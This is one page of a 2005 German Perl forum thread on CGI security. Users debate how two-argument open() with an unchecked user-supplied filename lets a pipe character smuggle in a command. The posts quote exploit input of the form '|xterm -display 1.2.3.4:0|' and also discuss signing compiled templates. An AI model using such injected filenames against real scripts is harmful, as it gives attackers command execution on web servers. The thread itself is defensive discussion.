Schrift
[thread]624[/thread]

CGI Sicherheit: Vermeidung gefährlicher Inhalte (Seite 11)

Leser: 2


<< |< 1 ... 8 9 10 11 12 13 14 ... 17 >| >> 166 Einträge, 17 Seiten
pq
 2005-12-19 02:30
#6218 #6218
User since
2003-08-04
12208 Artikel
Admin1
[Homepage]
user image
[quote=Bauhaus,18.12.2005, 18:33][quote=esskar,18.12.2005, 17:00]jetzt begründe mir mal, warum das funktionieren sollte.[/quote]
Sorry - ich hab den Code nicht geschrieben.
Aber das Teil funktioniert offensichtlich immer dann, wenn innerhalb des attackierten Skripts ein 'open' ohne '<' erfolgt.
Hatte ja schon gesagt: das ist einer von den harmlosen ;)[/quote]
Code: (dl )
1
2
3
4
5
6
tina@lux:~> perl -wle'
my $file = "xterm -display :0";
open FH, $file or die $!;
print while <FH>'
Datei oder Verzeichnis nicht gefunden at -e line 3.
tina@lux:~>

abgesehen davon, dass man sowieso die 3-argumente-form von open
benutzen sollte bzw. bei der 2-er-form auch immer > oder < davorschreiben
sollte, und abgesehen davon, dass man, wie ja auch von einigen hier ein-
oder mehrfach gesagt, natürlich nicht ungeprüft einen dateinamen aus dem userinput liest, siehst
du, dass es bei mir nicht läuft (hint: dateien werden mit < oder > geöffnet,
kommandos aber mit |.)
von daher frage ich mich, welche aussage du jetzt damit untermauern wolltest.
ich bin auch interessiert an sicherheit. (zum beispiel würde mich interessieren,
wie man das problem des kompilierens von template-code sicher gestalten
kann, da haben nämlich TT und HTC eine potentielle sicherheitslücke)
aber unter einer fruchtbaren diskussion zum thema verstehe ich was
anderes.\n\n

<!--EDIT|pq|1134952500-->
Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. -- Damian Conway in "Perl Best Practices"
lesen: Wiki:Wie frage ich & perlintro Wiki:brian's Leitfaden für jedes Perl-Problem
Antworten mit Zitat
esskar
 2005-12-19 02:45
#6219 #6219
User since
2003-08-04
7321 Artikel
ModeratorIn

user image
[quote=pq,19.12.2005, 01:30](zum beispiel würde mich interessieren,
wie man das problem des kompilierens von template-code sicher gestalten
kann, da haben nämlich TT und HTC eine potentielle sicherheitslücke)[/quote]
Mit einer Signatur z.b.

Man könnte eine art privaten-schlüssel in dem caller script verwenden um die signatur zu bauen. ändert der angreifer das kompilat, dann merkst du das am der falschen unterschrift...

dabei muss man aber ausgehen, dass das script "sicher" ist (also nicht readable für den angreifer ist).
Antworten mit Zitat
pq
 2005-12-19 04:21
#6220 #6220
User since
2003-08-04
12208 Artikel
Admin1
[Homepage]
user image
[quote=esskar,19.12.2005, 01:45]Mit einer Signatur z.b.

Man könnte eine art privaten-schlüssel in dem caller script verwenden um die signatur zu bauen. ändert der angreifer das kompilat, dann merkst du das am der falschen unterschrift...

dabei muss man aber ausgehen, dass das script "sicher" ist (also nicht readable für den angreifer ist).[/quote]
das ist mir schon klar. wenn das script selbst von anderen nicht lesbar ist,
kann man einiges machen.
es geht aber um scripte, die alle unter demselben (nämlich webserver-)user
laufen.
wo willst du da einen privaten schlüssel verstecken?
Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. -- Damian Conway in "Perl Best Practices"
lesen: Wiki:Wie frage ich & perlintro Wiki:brian's Leitfaden für jedes Perl-Problem
Antworten mit Zitat
Dubu
 2005-12-19 10:37
#6221 #6221
User since
2003-08-04
2145 Artikel
ModeratorIn + EditorIn

user image
[quote=esskar,18.12.2005, 20:47]aha. du hast also einen server gehackt.
und das soll man dir jetzt glauben? ???[/quote]
Nein, er hat sich von jemand anderem zeigen lassen, wie leicht sich sein Server mit diesem Trick hacken laesst.
(Und dieser andere war so nett, nur die angegebene Datei zu loeschen und nicht mehr.)

Es ist hier aber wohl jedem klar, dass man mit einem Aufruf wie open FH, "> $the_file.txt" or die $! und einer Variable $the_file direkt aus einer Benutzereingabe ein Scheunentor oeffnet.
Antworten mit Zitat
Dubu
 2005-12-19 10:48
#6222 #6222
User since
2003-08-04
2145 Artikel
ModeratorIn + EditorIn

user image
[quote=pq,19.12.2005, 01:30]
Code: (dl )
1
2
3
4
5
6
tina@lux:~> perl -wle'
my $file = "xterm -display :0";
open FH, $file or die $!;
print while <FH>'
Datei oder Verzeichnis nicht gefunden at -e line 3.
tina@lux:~>
[/quote]
Kein Wunder, dass das nicht klappt, du hast das Pipezeichen aus dem Exploitcode (%7C) weggelassen.

Der Exploitcode ist aber trotzdem kein guter Stil, weil er eine Pipe der Form "|xterm -display 1.2.3.4:0|" oeffnen will, und das ist natuerlich keine korrekte Syntax. Das funktioniert zwar trotzdem, gibt aber unter warnings eine Meldung ("Can't open bidirectional pipe at...").
Antworten mit Zitat
pq
 2005-12-19 15:15
#6223 #6223
User since
2003-08-04
12208 Artikel
Admin1
[Homepage]
user image
[quote=Dubu,19.12.2005, 09:48]Kein Wunder, dass das nicht klappt, du hast das Pipezeichen aus dem Exploitcode (%7C) weggelassen.[/quote]
ups... =) muss ich übersehen haben
Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. -- Damian Conway in "Perl Best Practices"
lesen: Wiki:Wie frage ich & perlintro Wiki:brian's Leitfaden für jedes Perl-Problem
Antworten mit Zitat
esskar
 2005-12-19 15:48
#6224 #6224
User since
2003-08-04
7321 Artikel
ModeratorIn

user image
[quote=pq,19.12.2005, 03:21]es geht aber um scripte, die alle unter demselben (nämlich webserver-)user
laufen.
wo willst du da einen privaten schlüssel verstecken?[/quote]
wie gesagt...
man hat wohl kaum eine chance, wenn man davon ausgeht, dass der selbe user der sich einhackt, sowohl das script als auch die compilate lesen/ändern kann. nur wenn du davon ausgehst, dass der hacker auf das script keinen lese/execute zugriff hat, hast du eine chance.
Antworten mit Zitat
Gast Gast
 2005-12-19 16:00
#6225 #6225
[quote=pq,19.12.2005, 14:15][quote=Dubu,19.12.2005, 09:48]Kein Wunder, dass das nicht klappt, du hast das Pipezeichen aus dem Exploitcode (%7C) weggelassen.[/quote]
ups... =) muss ich übersehen haben[/quote]
So kommt der Thread nicht weiter.
Einer liest den von ihm zitierten Text falsch (esskar).
Einer testet Exploits und übersieht was (pq).

Könnten wir uns nicht darauf einigen dass dies ein wichtiges Thema ist und von daher alles aufmerksam/unvoreingenommen gelesen/getestet werden sollte um dann zu einer umfassenden Lösung zu gelangen?

Muß doch irgendwie möglich sein - denk ich mal. :)
Antworten mit Zitat
esskar
 2005-12-19 16:08
#6226 #6226
User since
2003-08-04
7321 Artikel
ModeratorIn

user image
[quote=Bauhaus,19.12.2005, 15:00]Einer liest den von ihm zitierten Text falsch (esskar).[/quote]
wie, wo, was?
Antworten mit Zitat
pq
 2005-12-19 16:08
#6227 #6227
User since
2003-08-04
12208 Artikel
Admin1
[Homepage]
user image
[quote=Bauhaus,19.12.2005, 15:00]So kommt der Thread nicht weiter.[/quote]
ja, seh ich auch so. du scheinst daran kein interesse zu haben.
was genau an "usereingaben benutzt man nicht ungeprüft als dateinamen"
verstehst du nicht?
und was genau an "benutze -T" verstehst du nicht?
und was an "perldoc perlsec" versehst du nicht?
du verhältst dich irgendwie trollig (sic!).\n\n

<!--EDIT|pq|1135001521-->
Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. -- Damian Conway in "Perl Best Practices"
lesen: Wiki:Wie frage ich & perlintro Wiki:brian's Leitfaden für jedes Perl-Problem
Antworten mit Zitat
<< |< 1 ... 8 9 10 11 12 13 14 ... 17 >| >> 166 Einträge, 17 Seiten



View all threads created 2005-12-12 17:10.